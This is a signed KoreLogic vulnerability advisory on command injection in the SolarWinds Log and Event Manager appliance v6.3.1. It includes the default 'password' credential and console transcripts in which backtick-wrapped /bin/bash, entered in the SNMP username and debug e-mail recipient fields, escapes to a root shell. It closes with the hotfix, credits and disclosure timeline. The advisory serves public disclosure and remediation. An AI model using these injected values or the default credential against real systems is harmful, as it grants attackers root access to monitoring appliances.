-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection Title: Solarwinds LEM Management Shell Escape via Command Injection Advisory ID: KL-001-2017-007 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command Impact: Privileged Access Attack vector: SSH 2. Vulnerability Description Insufficient input validation in the management interface can be leveraged in order to execute arbitrary commands. This can lead to (root) shell access to the underlying operating system. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug. ============ = SNMP = ============ This is accomplished by placing `/bin/bash` in the username input during SNMP server setup. $ ssh cmc@1.3.3.7 Password: Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6 ////////////////////////////////////////////////// /// SolarWinds Log & Event Manager /// /// management console /// ////////////////////////////////////////////////// Detected VMware Virtual Platform Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH Available commands: [ appliance ] Network, System [ manager ] Upgrade, Debug [ service ] Restrictions, SSH, Snort [ ndepth ] nDepth Configuration/Maintenance upgrade Upgrade this Appliance admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration) import Import a file that can be used from the Admin UI help display this help exit Exit cmc > service Available commands: startssh Start the SSH Service stopssh Stop the SSH Service restartssh Restart the SSH Service restrictssh Restrict Access to the SSH Service (by IP Address/hostname) unrestrictssh Remove Restrictions on Access to the SSH Service snmp Configure the SNMP Services copysnortrules Copy Snort rules to floppy or network share loadsnortrules Load Snort rules from floppy or network share loadsnortbackup Load Snort rules from backup restartsnort Restart the Snort Service enableflow * Enable the flow Collection Service disableflow Disable the flow Collection Service restrictconsole Restrict Access to the Manager Console (GUI) by IP/hostname unrestrictconsole Remove Restrictions on Access to the Console (GUI) restrictreports Restrict Access to Reports by IP/hostname unrestrictreports Remove Restrictions on Access to Reports stopopsec Stop all running OPSEC LEA client connections help display this help exit Return to main menu NOTE: Commands with an asterisk (*) include an automatic manager service restart cmc::service > snmp SNMP Trap Logging Service is RUNNNING Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y SNMP Request Service is RUNNNING Would you like to STOP the SNMP Request Service? [Y/n] Y The SNMP Trap Logging Service is stopped. The SNMP Request Service is stopped. cmc::service > snmp SNMP Trap Logging Service is DISABLED Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y SNMP Request Service is DISABLED Would you like to ENABLE the SNMP Request Service? [Y/n] Y Enter the port number to access SNMP on LEM (default: 161): Enter the username to access SNMP on LEM (default: orion): `/bin/bash` Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1): Enter the authentication password (default: orion123): Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128): Enter the encryption key (default: orion123): cmc@swi-lem:/usr/local/contego$ ============ = Debug = ============ This is accomplished by placing `/bin/bash` in the destination email input during debug. $ ssh cmc@1.3.3.7 Password: Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6 ////////////////////////////////////////////////// /// SolarWinds Log & Event Manager /// /// management console /// ////////////////////////////////////////////////// Detected VMware Virtual Platform Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH Available commands: [ appliance ] Network, System [ manager ] Upgrade, Debug [ service ] Restrictions, SSH, Snort [ ndepth ] nDepth Configuration/Maintenance upgrade Upgrade this Appliance admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration) import Import a file that can be used from the Admin UI help display this help exit Exit cmc > manager Available commands: actortoolupgrade * Upgrade your Manager's Actor Tools (CD/floppy) archiveconfig Set your Manager Database Archive Schedule/Settings backupconfig Set your Manager Backup Schedule/Settings cleanagentconfig Reconfigure the agent on this box to a new manager configurendepth * Configure the manager to use an nDepth server. confselfsignedcert * Configure the manager to use a self signed certificate dbrestart Restart database debug Send Debugging Information to an Alternate Address disabletls Disable TLS for DB connections enabletls Enable TLS for DB connections exportcert Export the CA certificate for console exportcertrequest Export a certificate request for signing by CA hotfix Install LEM hotfix. importcert * Import a certificate used for console communication importl4ca * Import a CA of the other node in L4 configuration licenseupgrade * Upgrade your Manager License (CD/floppy/network) logbackupconfig Set your Manager Log Backup Schedule/Settings resetadmin Reset the "admin" user password to default restart * Restart Manager Service sensortoolupgrade Upgrade your Manager and Agent Sensor Tools (CD/floppy) showlog Show Manager Log File showmanagermem Show the memory setting of SolarWinds manager start Start Manager Service stop * Stop Manager Service support Send Debugging Information to Tech Support @trigeo.com togglehttp * Enable or disable HTTP (port 80). viewsysinfo Show information about machine and SolarWinds manager watchlog Watch Manager Log File exit Return to main menu NOTE: Commands with an asterisk (*) include an automatic manager service restart cmc::manager > debug Press to capture debugging information You will need to provide an SMTP server or Windows File Sharing Credentials Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host UpdateInfo failed: VMware Guest API is not enabled on the host UpdateInfo failed: VMware Guest API is not enabled on the host UpdateInfo failed: VMware Guest API is not enabled on the host UpdateInfo failed: VMware Guest API is not enabled on the host UpdateInfo failed: VMware Guest API is not enabled on the host .e.sudo: unable to resolve host swi-lem sudo: unable to resolve host swi-lem .cat: /etc/hosts: No such file or directory done. sudo: unable to resolve host swi-lem E-Mail/Network share/Quit? (e/n/q) e E-Mail/Network share/Quit? (e/n/q) e Please enter the e-mail recipient: (e.g. support@trigeo.com) > `/bin/bash >&2` Is the e-mail address <`/bin/bash >&2`> correct? Y Please enter the name this message should appear from (e.g. Someone Important) > Test Is the name Test correct? Y Please enter the e-mail address this message should appear from (e.g. someone@trigeo.com) > fake@localhost Is the e-mail address fake@localhost correct? Y Please enter the SMTP server you wish to send mail through (e.g. smtp.yournetwork.com) > 127.0.0.1 Is the SMTP server 127.0.0.1 correct? Y Please enter the name of your company (e.g. Initech, Post Falls branch or Veridian Dynamics) > Test Is the company Test correct? Y Please enter a phone number where you can be reached (e.g. 509.555.1234) > Test Is the number Test correct? Y --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]-- /tmp # id uid=0(root) gid=0(root) groups=0(root) --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]-- 4. Mitigation and Remediation Recommendation The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at: https://thwack.solarwinds.com/thread/111223 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc. 6. Disclosure Timeline 2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F. 2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel. 2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact. 2017.02.23 - Solarwinds confirms receipt of vulnerability report. 2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details. 2017.04.11 - Solarwinds releases hotfix and public disclosure. 2017.04.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt -----BEGIN PGP SIGNATURE----- iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlj+VoEaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQzp9AgAhAu3fN2lrvCC6IGo30Fm kTEj5Im1nOGJ5UrAy9fiENXCAiHWDeqh0QifcwcYuR0JvzyjdN7tyShis7NhWn5Q cu327GhLL87Aaf+3gJ7amNjsCGfBut2tDC3dHpXw3ePcWrUITFYi8odP67PD46Ft uP8yOJIjHGf0Q2UZBE3c2mliZdPuw5tOATbtHvEGpFGJ6pIauFgeO7ytQSFFGmCo HtWDEJOW4H5T4aPLY676gkAEPVNeo5kKtFsBtnZIUkodBX/BpXsuH8eyYHYzV3na iVgDYvfT4hFNgsG/cKq+odklniG6rMAxtDq1S48xCy1Gwqc+fqr5IZDz2djBo3jk rA== =NnhW -----END PGP SIGNATURE-----